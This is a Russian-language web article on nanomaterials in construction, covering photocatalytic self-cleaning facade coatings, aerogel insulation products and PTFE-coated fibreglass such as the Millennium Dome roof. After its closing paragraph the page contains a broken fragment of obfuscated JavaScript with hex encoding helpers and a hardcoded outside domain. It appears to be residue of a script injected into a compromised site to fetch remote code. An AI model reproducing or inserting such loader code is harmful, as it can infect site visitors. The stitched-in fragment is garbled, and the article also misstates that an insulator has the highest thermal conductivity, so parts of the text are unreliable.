Применение наноматериалов для усовершенствования строительства


Сегодня наноматериалы получают в строительной сфере  все большее распространение. И в этом нет ничего удивительного – ведь по сравнению с простыми строительными материалами наноматериалы обладают рядом улучшенных свойств, такими как  износостойкость, электрофизические свойства, огнестойкость и иными улучшенными свойствами. Применение новейших технологий уменьшит затраты на строительство, уменьшит общую продолжительность строительства и увеличить безопасность материалов , другими словами, сделать процесс строительства наиболее эффективным и менее затратным.

Известно, что поверхность фасадов, выполненных из обычных материалов, таких как штукатурка, бетон и других материалов,  трудноочищаема. А вот, к примеру, покрытия SolarStucco обладают технологией самоочищения за счет использования в них естественного фотокатализатора и предпринятой нанотехнологии: на свету фотокатализатор подвергает разложению органические загрязнители, которые потом легко смываются дождевыми потоками.

Таким образом, подобное покрытие препятствует образованию плесени, мха, грибка и даже защищает от обесцвечивания ультрафиолетом. Поверхность здания остается чистой на протяжении нескольких лет без специальных усилий. И, таким образом, решаются несколько задач, в числе которых также – снижение негативного воздействия на окружающую среду. Дополнительная выгода — снижение расходования воды и химикатов, степени воздействия на окружающую среду, балансовой стоимости эксплуатации зданий.

Одним их самых необычных новейших материалов единогласно признан материал, который вошел в Книгу рекордов Гиннеса, — аэрогель или, как его называют по-другому, «твердый воздух», или «замороженный дым». Это – новое слово в развитии теплоизоляционных технологий. Высокотехнологичный материал был синтезирован еще в первой половине 20 века, но применение это изобретение нашло только сейчас. Он представляет из себя гель, где жидкая фаза заменена газообразной. На вид это — подобие пенопласта, твердой пены. С одной стороны, аэрогель имеет очень низкую плотность, с другой — он обладает многими незаменимыми свойствами – твердостью, прозрачностью, жаропрочностью и прочими важными качествами.

Аэрогель выдерживает нагрузку в две тысячи раз больше, чем его собственный вес. Материалы, в основе которых лежит аэрогель, успешно применяются не только для теплоизоляции трасс и различных тепловых оборудований, но и в домашнем строительстве. Например, в каркасном строительстве употребляется специально созданный Spaceloft, состоящий из стеклоткани и аэрогеля с толщиной не более 1 см и наивысшими проявлениями теплопроводности.

Самые лучшие теплоизоляторы – кварцевые аэрогели, к тому же они еще и гигроскопичны. Из нанопористого аэрогеля получают новые материалы — криогель и пирогель, которые признаны лучшими  теплоизоляционными материалами.У них весьма широкий температурный режим – от -270 до +385 градусов, они абсолютно безопасны для окружающей среды, безвредны для людей и долговечны.. А утилизация таких изоляторов гораздо проще и удобнее, ведь их объем гораздо меньше, чем у других применяемых в строительстве традиционных материалов, следовательно, и на свалку мусора уйдет куда меньше отходов.

Ткань из прочного стекловолокна, пропитанная антипригарным тефлоновым слоем (PTFE), пропитанная с одной стороны клеем, — новейший многофункциональный продукт весьма широкого спектра действия.Такая ткань устойчива к старению и различным погодным условиям, с нее легко удаляются смоляные, клеевые и другие трудные пятна. Она стойка к химическому воздействию со стороны кислот, щелочей, органических растворов. У нее прекрасные изоляционные характеристики. Сейчас тефлоновая ткань активно используется в строительстве.

«Купол тысячелетия» в лондонском Гринвиче — одно из самых грандиозных строений в мире – с диаметром в 320 метров и длиной окружности в километр. Купол скрывает под собой 8 гектаров площади, крыша удерживается 12 решетчатыми мачтами высотой по 100 м. Крыша этого здания изготовлена именно с использованием стекловолокна, покрытого тефлоном.

Поначалу планировалось изготовление крыши из полиэфира с покрытием из ПВХ, однако данное покрытие не соответствовало экологическим требованиям. А вот тканое стекловолокно с тефлоновым покрытием полностью отвечает условию наличия двух обязательных составляющих – долгосрочности и экологической совместимости. Служить она будет не менее 25 лет, безопасна для окружающей среде – в ней нет токсичных добавок. Абсолютно гладкая поверхность остается чистой в течение нескольких лет. Но самое главное достоинство ее как строительного материала – пожаробезопасность.

Разработка и применение новейших технологий и материалов усовершенствует строительное производство, сделает его более безопасным и менее трудоемким.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "integross.net"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Рейтинг: 0

Автор публикации

1
не в сети 2 года

Мария Фабричных

Комментарии: 2Публикации: 9Регистрация: 20-03-2016

Оставьте комментарий